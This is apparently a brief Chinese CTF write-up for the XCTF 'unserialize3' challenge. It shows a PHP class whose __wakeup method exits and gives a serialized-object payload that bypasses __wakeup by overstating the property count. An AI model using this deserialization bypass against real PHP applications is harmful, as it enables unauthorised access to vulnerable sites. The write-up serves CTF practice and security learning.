unserialize3

unserialize3

审计代码

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

这里明显就是考个绕过__wakeup函数,而且应该代码没给全

payload

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
原文地址:https://www.cnblogs.com/NineOne/p/13843445.html